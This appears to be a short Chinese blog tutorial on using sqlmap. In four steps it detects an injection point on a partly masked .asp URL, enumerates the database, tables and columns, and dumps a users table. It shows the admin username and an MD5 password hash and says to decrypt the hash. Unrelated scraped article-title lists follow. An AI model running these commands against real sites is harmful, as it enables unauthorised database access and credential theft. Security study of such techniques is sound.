1.判断一个url是否存在注入点:

   .sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs 

假设找到数据库:student

 ------------------------------available databases[1][*] student------------------------------

2.获取数据库中的表名:

   .sqlmap.py -u "http://abcd****efg.asp?id=7" -D student --tables

假设找到表名:users

   -----------------------[INFO] retrieved:users-----------------------

3.获取表中的字段名:

  .sqlmap.py -u "http://abcd****efg.asp?id=7" -D student -T users --columns

假设获取出字段为:id username password

---------------------------------[INFO] retrieved:       id[INFO] retrieved:       int(3)[INFO] retrieved:       username[INFO] retrieved:       varchar(30)[INFO] retrieved:       password[INFO] retrieved:       varchar(30)
----------------------------------

4.猜字段内容:

    .sqlmap.py -u "http://abcd****efg.asp?id=7" -D student -T users -C id,username,password --dump

获取结果:

  [INFO] retrieved:       1[INFO] retrieved:       admin[INFO] retrieved:       21232f297a57a5a743894a0e4a801fc3  (32位MD5加密密文)

账号:admin 密码:将密文解密即可。

转载于:https://www.cnblogs.com/xingyunblog/p/4115716.html

2.羽翼sqlmap学习笔记之MySQL注入相关推荐

  1. 4.羽翼sqlmap学习笔记之Post登录框注入

    4.Sqlmap系列教程--post登录框注入 注入点: http://xxx.xxx.com/Login.asp 注入方式一: 1.对着注入点使用burp抓包,保存txt格式文件. 2.输入命令: ...

  2. SpringMVC:学习笔记(11)——依赖注入与@Autowired

    SpringMVC:学习笔记(11)--依赖注入与@Autowired 使用@Autowired 从Spring2.5开始,它引入了一种全新的依赖注入方式,即通过@Autowired注解.这个注解允许 ...

  3. spring学习笔记03-spring-DI-依赖注入详解(通过xml配置文件来配置依赖注入)

    spring学习笔记03-spring-DI-依赖注入详解 1.概念 2.构造函数注入 3.set方法注入 4.集合的注入 需要被注入的实体对象 package com.itheima.service ...

  4. 架构mysql_MySQL学习笔记之MySQL架构

    MySQL 最重要.最与众不同的特性是它的存储引擎架构,这种架构的设计将查询处理及其他系统任务和数据的存储/提取相分离.这种处理和存储分离的设计可以在使用时根据性能.特性,以及其他需求来选择数据存储的 ...

  5. MySQL学习笔记 | 04 - MySQL数据库基本操作(增加、修改、删除、查看)

    MySQL学习笔记 | 01-为什么要使用数据库 MySQL学习笔记 | 02 - MySQL在Windows下的安装.配置.服务启动/停止.用户登录.查看版本号 MySQL学习笔记 | 03 - M ...

  6. SQLmap学习笔记

    SQLmap参数学习笔记 文章目录 SQLmap参数学习笔记 简介 Options - 设置 显示等级 Target - 目标 对POST请求进行注入 HTTPS检测 Request - 请求 HTT ...

  7. 网络安全-sqlmap学习笔记

    目录 介绍 命令参数 指定目标 直连数据库 服务型数据库(前提知道数据库用户名和密码) 文件型数据库(前提知道数据库绝对路径) URL探测 文件读取目标 Google dork注入 Http参数 设置 ...

  8. Qt学习笔记之MySQL数据库

    一.MySQL概述 MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,属于 Oracle 旗下产品.MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQ ...

  9. 【学习笔记】MySQL数据库高级版 - 索引优化、慢查询、锁机制等

    本文是尚硅谷周阳(阳哥)老师的MySQL高级篇视频的学习笔记.由于视频比较老,所以在高版本的MySQL中索引的地方做了优化,和视频的内容不完全一样,不过大体一致.从第四节锁机制开始的部分还没有整理. ...

最新文章

  1. Redis: Redis Desk Manager Setup
  2. android保存文件到手机内存
  3. 现身说法:实际业务出发分析百亿数据量下的多表查询优化
  4. webgl 着色器_如何使用AI,AR和WebGL着色器来帮助视障人士
  5. boost::interprocess::named_mutex的翻译和学习
  6. 一个 WordPress 安装,多个博客
  7. node.js第十课(HTTPserver)
  8. minicom 使用方法
  9. airpak模拟案例_《CFD模拟基本概念》Airpak模拟高级班48讲
  10. Cocos技术派 | TS版属性声明详解
  11. 测度论与概率论基础(程士宏)学习笔记(一)
  12. 亮度,饱和度,对比度的计算方法
  13. 他山之石 | 微信搜一搜中的智能问答技术
  14. Android studio学习笔记:adb被系统空闲进程占用了怎么办?
  15. android实现高德地图集成
  16. Flowable 工作流引擎
  17. php phalcon 安装,Phalcon框架安装与使用教程介绍
  18. 通过QQ互联实现网站第三方登录
  19. Html form表单验证
  20. 信号量实现理发师问题

热门文章

  1. 谈谈 ForkJoin 框架的设计与实现
  2. 一次 Young GC 的优化实践
  3. 身为Java程序员,这些开源工具你一定要学会!
  4. 大型网站架构学习笔记
  5. [Python]网络爬虫(五):urllib2的使用细节与抓站技巧
  6. GO select用法详解
  7. 多线程:一些好的编程建议
  8. Android --- Session ‘app’: Error Launching activity解决办法
  9. 消防验收找问题,一般就是这些了!
  10. 数据港:攻破OPEX+SLA难题,实现全生命周期效能管理